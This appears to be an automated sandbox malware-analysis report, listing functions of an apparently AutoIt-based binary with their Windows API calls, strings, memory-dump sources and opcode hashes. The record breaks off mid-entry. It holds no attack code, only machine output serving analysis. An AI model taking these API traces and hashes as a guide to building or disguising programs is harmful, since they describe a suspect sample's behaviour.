                                                          • Opcode ID: 3bf8de92c5b4ece72babe45ba2712b70bba24c8275e1a0b29f6fdfed18b5e38f
                                                          • Instruction ID: 2b54b5f2ea5485ab74f8bfab3cac73a19d546e8d02d729d5aecd0aec00f3796d
                                                          • Opcode Fuzzy Hash: 3bf8de92c5b4ece72babe45ba2712b70bba24c8275e1a0b29f6fdfed18b5e38f
                                                          • Instruction Fuzzy Hash: D5E05276104505FFDA022FE6EC0CD5ABB6EFB89762B548632F219C1470CB32A461DB50
                                                          Function 00397858 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 231COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,003D2C7C,?), ref: 00397A12
                                                          • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,003D2C7C,?), ref: 00397A2A
                                                          • CLSIDFromProgID.OLE32(?,?,00000000,003CFB80,000000FF,?,00000000,00000800,00000000,?,003D2C7C,?), ref: 00397A4F
                                                          • _memcmp.LIBCMT ref: 00397A70
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: FromProg$FreeTask_memcmp
                                                          • String ID: ,,=
                                                          • API String ID: 314563124-2941206825
                                                          • Opcode ID: 06fbb13327cc71d623923a11d79ad438eea833b739fe6a3228f5a53b59627e3f
                                                          • Instruction ID: 7917d984a75d0cc5fb80f0dc36e50ce515aaea1e07c6af6575b08c12d443b981
                                                          • Opcode Fuzzy Hash: 06fbb13327cc71d623923a11d79ad438eea833b739fe6a3228f5a53b59627e3f
                                                          • Instruction Fuzzy Hash: AB811971A10109EFCF05DF94C988EEEB7B9FF89315F204199E516AB290DB71AE05CB60
                                                          Function 003B8702 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VariantInit.OLEAUT32(?), ref: 003B8728
                                                          • CharUpperBuffW.USER32(?,?), ref: 003B8837
                                                          • VariantClear.OLEAUT32(?), ref: 003B89AF
                                                            • Part of subcall function 003A760B: VariantInit.OLEAUT32(00000000), ref: 003A764B
                                                            • Part of subcall function 003A760B: VariantCopy.OLEAUT32(00000000,?), ref: 003A7654
                                                            • Part of subcall function 003A760B: VariantClear.OLEAUT32(00000000), ref: 003A7660
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                          • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                          • API String ID: 4237274167-1221869570
                                                          • Opcode ID: 7f9360bc9461d3979d7257cb6d03c11a39b4e64f91985f89582fd5b6589f3e47
                                                          • Instruction ID: b8f4244b2445d75d0ebc34ef9210351242ce624dbde7e3c09de4192447de24d4
                                                          • Opcode Fuzzy Hash: 7f9360bc9461d3979d7257cb6d03c11a39b4e64f91985f89582fd5b6589f3e47
                                                          • Instruction Fuzzy Hash: 289190756043019FCB05DF24C4819ABBBE8EF89318F14896EF996CB761DB31E905CB52
                                                          Function 003A2D8E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 0035FE06: _wcscpy.LIBCMT ref: 0035FE29
                                                          • _memset.LIBCMT ref: 003A2E7F
                                                          • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 003A2EAE
                                                          • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 003A2F61
                                                          • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 003A2F8F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                          • String ID: 0
                                                          • API String ID: 4152858687-4108050209
                                                          • Opcode ID: 6be89883156e7ce7d9da61e5b20aee32bd73b3bb8848bb0b5a9684d1132c3541
                                                          • Instruction ID: a19b5b82586f5788fd34215a30460bb2be22f280443192111a845039cfd2b15b
                                                          • Opcode Fuzzy Hash: 6be89883156e7ce7d9da61e5b20aee32bd73b3bb8848bb0b5a9684d1132c3541
                                                          • Instruction Fuzzy Hash: E851C0316083019ED7269F2CC845A6BB7F8EF86310F054A2EF894EA191DB70DD448B92
                                                          Function 003A2A4B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _memset.LIBCMT ref: 003A2AB8
                                                          • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 003A2AD4
                                                          • DeleteMenu.USER32(?,00000007,00000000), ref: 003A2B1A
                                                          • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00405890,00000000), ref: 003A2B63
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Menu$Delete$InfoItem_memset
                                                          • String ID: 0
                                                          • API String ID: 1173514356-4108050209
                                                          • Opcode ID: f160113c850f5928b07de30967e08ad1dd7551c73170c52fc3ce47035c8b11f6
                                                          • Instruction ID: cc5d6ba8af2ad0c1beb4d8f0929d7e3f5fca701d7ec6b8c63b83ce9ab64fa048
                                                          • Opcode Fuzzy Hash: f160113c850f5928b07de30967e08ad1dd7551c73170c52fc3ce47035c8b11f6
                                                          • Instruction Fuzzy Hash: 2E41A4712043029FD726DF28C885F2BB7E9EF86320F15465DF9669B291D770E904CB62
                                                          Function 003BD8B9 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 003BD8D9
                                                            • Part of subcall function 003479AB: _memmove.LIBCMT ref: 003479F9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: BuffCharLower_memmove
                                                          • String ID: cdecl$none$stdcall$winapi
                                                          • API String ID: 3425801089-567219261
                                                          • Opcode ID: 6f07fee272efffa0b6c692ea11f9ee976a2e4fd29a9aad69e8021ed592bbbdf4
                                                          • Instruction ID: ddded56359db4d4384e5ee45057ef2e1cafbf28bde2a73f30286bedce0752b05
                                                          • Opcode Fuzzy Hash: 6f07fee272efffa0b6c692ea11f9ee976a2e4fd29a9aad69e8021ed592bbbdf4
                                                          • Instruction Fuzzy Hash: 7531C070904619AFCF16EF54CC919FEB3B4FF05314B10862AE9659FAD1DB31A905CB80
                                                          Function 00399152 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00347F41: _memmove.LIBCMT ref: 00347F82
                                                            • Part of subcall function 0039AEA4: GetClassNameW.USER32(?,?,000000FF), ref: 0039AEC7
                                                          • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 003991D6
                                                          • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 003991E9
                                                          • SendMessageW.USER32(?,00000189,?,00000000), ref: 00399219
                                                            • Part of subcall function 00347D2C: _memmove.LIBCMT ref: 00347D66
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$_memmove$ClassName
                                                          • String ID: ComboBox$ListBox
                                                          • API String ID: 365058703-1403004172
                                                          • Opcode ID: 1577aec9b4e67e1384292f9718a075c063f37a754d8809ac3ca98e7c8162a23f
                                                          • Instruction ID: e4d1fc209a0e016ab44946f4e441094357ac7dd389b588fb2d1f038d8e25b05f
                                                          • Opcode Fuzzy Hash: 1577aec9b4e67e1384292f9718a075c063f37a754d8809ac3ca98e7c8162a23f
                                                          • Instruction Fuzzy Hash: A8210431904108BFDF16AB74CC86DFEB7A9DF05360F10452EF4659B2E1DB351D0A9610
                                                          Function 0034410D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0037D51C
                                                            • Part of subcall function 00347D2C: _memmove.LIBCMT ref: 00347D66
                                                          • _memset.LIBCMT ref: 0034418D
                                                          • _wcscpy.LIBCMT ref: 003441E1
                                                          • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 003441F1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                          • String ID: Line:
                                                          • API String ID: 3942752672-1585850449
                                                          • Opcode ID: dfe71ae6cdc21c4ab5cb93911081c737da093ab91cfa49cd9fbac65f1203006a
                                                          • Instruction ID: 50aad418ced52e5ca7981b08d5b63db0a54e85e26e69fa8ee9f353eb5abc606c
                                                          • Opcode Fuzzy Hash: dfe71ae6cdc21c4ab5cb93911081c737da093ab91cfa49cd9fbac65f1203006a
                                                          • Instruction Fuzzy Hash: EA318171408704ABD723EB60DD45FDB77ECAF44310F10452EF5859A1A1EB74B648CB96
                                                          Function 003B1943 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 003B1962
                                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003B1988
                                                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 003B19B8
                                                          • InternetCloseHandle.WININET(00000000), ref: 003B19FF
                                                            • Part of subcall function 003B2599: GetLastError.KERNEL32(?,?,003B192D,00000000,00000000,00000001), ref: 003B25AE
                                                            • Part of subcall function 003B2599: SetEvent.KERNEL32(?,?,003B192D,00000000,00000000,00000001), ref: 003B25C3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                          • String ID:
                                                          • API String ID: 3113390036-3916222277
                                                          • Opcode ID: f51722bee96b5c809fec1d5d3a94b4442840f5e0a1dd73d9ec21a1fca614bea6
                                                          • Instruction ID: e2610c0f6316aa33f62a28bc95b73103c26c14fd72006fb3bf2e4443fe7827b0
                                                          • Opcode Fuzzy Hash: f51722bee96b5c809fec1d5d3a94b4442840f5e0a1dd73d9ec21a1fca614bea6
                                                          • Instruction Fuzzy Hash: 7B21A4B2500208BFE7239F60DCA5EFF77ADEB49748F10411AF605D6540EB25AE0597B1
                                                          Function 003C6419 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00341D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00341D73
                                                            • Part of subcall function 00341D35: GetStockObject.GDI32(00000011), ref: 00341D87
                                                            • Part of subcall function 00341D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00341D91
                                                          • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 003C6493
                                                          • LoadLibraryW.KERNEL32(?), ref: 003C649A
                                                          • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 003C64AF
                                                          • DestroyWindow.USER32(?), ref: 003C64B7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                          • String ID: SysAnimate32
                                                          • API String ID: 4146253029-1011021900
                                                          • Opcode ID: 31cecca665f09aa99ee9c4e8f7f493d10d86e98a1dbf8744027d24f42821afd8
                                                          • Instruction ID: 455af08027eb5428dc2c62fc56b4146c6c057413c649a6ac37a4a9e8cedb6086
                                                          • Opcode Fuzzy Hash: 31cecca665f09aa99ee9c4e8f7f493d10d86e98a1dbf8744027d24f42821afd8
                                                          • Instruction Fuzzy Hash: 81218871600609BFEF164E66DC82FBB37ADEB49364F11862DFA14D6190CB31EC91A760
                                                          Function 003A6E45 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetStdHandle.KERNEL32(0000000C), ref: 003A6E65
                                                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 003A6E98
                                                          • GetStdHandle.KERNEL32(0000000C), ref: 003A6EAA
                                                          • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 003A6EE4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: CreateHandle$FilePipe
                                                          • String ID: nul
                                                          • API String ID: 4209266947-2873401336
                                                          • Opcode ID: fcce2bb171d9fff67ed5f250f0286547538daaf14a46b000d23cf1ae71c92ef3
                                                          • Instruction ID: 0740605be03cceabda9d6fa0148fca16040c4b7b9c53db2302c18787e598e8ab
                                                          • Opcode Fuzzy Hash: fcce2bb171d9fff67ed5f250f0286547538daaf14a46b000d23cf1ae71c92ef3
                                                          • Instruction Fuzzy Hash: A4217478600205AFDB229F29DD06E9A77F8EF56760F284A19FDA1D72D0DB709850CB50
                                                          Function 003A6F13 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetStdHandle.KERNEL32(000000F6), ref: 003A6F32
                                                          • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 003A6F64
                                                          • GetStdHandle.KERNEL32(000000F6), ref: 003A6F75
                                                          • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 003A6FAF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: CreateHandle$FilePipe
                                                          • String ID: nul
                                                          • API String ID: 4209266947-2873401336
                                                          • Opcode ID: 5b7b46a912329500d73b10850eb926dd3eab1f6dc9c9aa662d03a55be030e5dd
                                                          • Instruction ID: f8011c6e23b60c2a39f162da6bde92580a61e6727edce4e51198fbe22193383a
                                                          • Opcode Fuzzy Hash: 5b7b46a912329500d73b10850eb926dd3eab1f6dc9c9aa662d03a55be030e5dd
                                                          • Instruction Fuzzy Hash: 3421B375604305AFDB229F69EC0AA9977E8EF56730F280A59FCB1E72D0D770A8508B50
                                                          Function 003AACCA Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetErrorMode.KERNEL32(00000001), ref: 003AACDE
                                                          • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 003AAD32
                                                          • __swprintf.LIBCMT ref: 003AAD4B
                                                          • SetErrorMode.KERNEL32(00000000,00000001,00000000,003CF910), ref: 003AAD89
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: ErrorMode$InformationVolume__swprintf
                                                          • String ID: %lu
                                                          • API String ID: 3164766367-685833217
                                                          • Opcode ID: 765859c5fabcf45c305b3e3481299b24d32b4f63ebba3083cbbbfc16e08a8c17
                                                          • Instruction ID: ca59820936eab2d62cf823ab3cefb6ef29b00c9d01f17c1da94ce702d356c8ca
                                                          • Opcode Fuzzy Hash: 765859c5fabcf45c305b3e3481299b24d32b4f63ebba3083cbbbfc16e08a8c17
                                                          • Instruction Fuzzy Hash: 34214135A00209AFCB11EFA5C985EEE7BF8EF49704B044069F509DF251DB31EA41CB61
                                                          Function 0039A30F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00347D2C: _memmove.LIBCMT ref: 00347D66
                                                            • Part of subcall function 0039A15C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0039A179
                                                            • Part of subcall function 0039A15C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0039A18C
                                                            • Part of subcall function 0039A15C: GetCurrentThreadId.KERNEL32 ref: 0039A193
                                                            • Part of subcall function 0039A15C: AttachThreadInput.USER32(00000000), ref: 0039A19A
                                                          • GetFocus.USER32 ref: 0039A334
                                                            • Part of subcall function 0039A1A5: GetParent.USER32(?), ref: 0039A1B3
                                                          • GetClassNameW.USER32(?,?,00000100), ref: 0039A37D
                                                          • EnumChildWindows.USER32(?,0039A3F5), ref: 0039A3A5
                                                          • __swprintf.LIBCMT ref: 0039A3BF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                                          • String ID: %s%d
                                                          • API String ID: 1941087503-1110647743
                                                          • Opcode ID: 17693a61bc691b01fde7e51c1c17873fa9be83b99f08f5acf6ff5c5787bc28fc
                                                          • Instruction ID: 21fc500ec757f651af5def1b038dfdb824529bf3e6399c37302dbc968de3f6db
                                                          • Opcode Fuzzy Hash: 17693a61bc691b01fde7e51c1c17873fa9be83b99f08f5acf6ff5c5787bc28fc
                                                          • Instruction Fuzzy Hash: B8117F756002096BDF12BF60DC86FEA37BDAF45700F004175F908AE252CB7069559BB1
                                                          Function 003BEC69 Relevance: 7.7, APIs: 5, Instructions: 247COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 003BED1B
                                                          • GetProcessIoCounters.KERNEL32(00000000,?), ref: 003BED4B
                                                          • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 003BEE7E
                                                          • CloseHandle.KERNEL32(?), ref: 003BEEFF
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                          • String ID:
                                                          • API String ID: 2364364464-0
                                                          • Opcode ID: 6e01c2cc804b6f2e1b602047458437887a458932df10ebc8ebefb27ca2e98c58
                                                          • Instruction ID: 70c22330120b7bb98df6ee52bc064c7e235bc88154d9cb704c9dbd344b22e41c
                                                          • Opcode Fuzzy Hash: 6e01c2cc804b6f2e1b602047458437887a458932df10ebc8ebefb27ca2e98c58
                                                          • Instruction Fuzzy Hash: 7D814F716043009FD721EF28C886BAAB7E5AF48714F15881DF995DF792DAB0AC408B91
                                                          Function 0036558D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
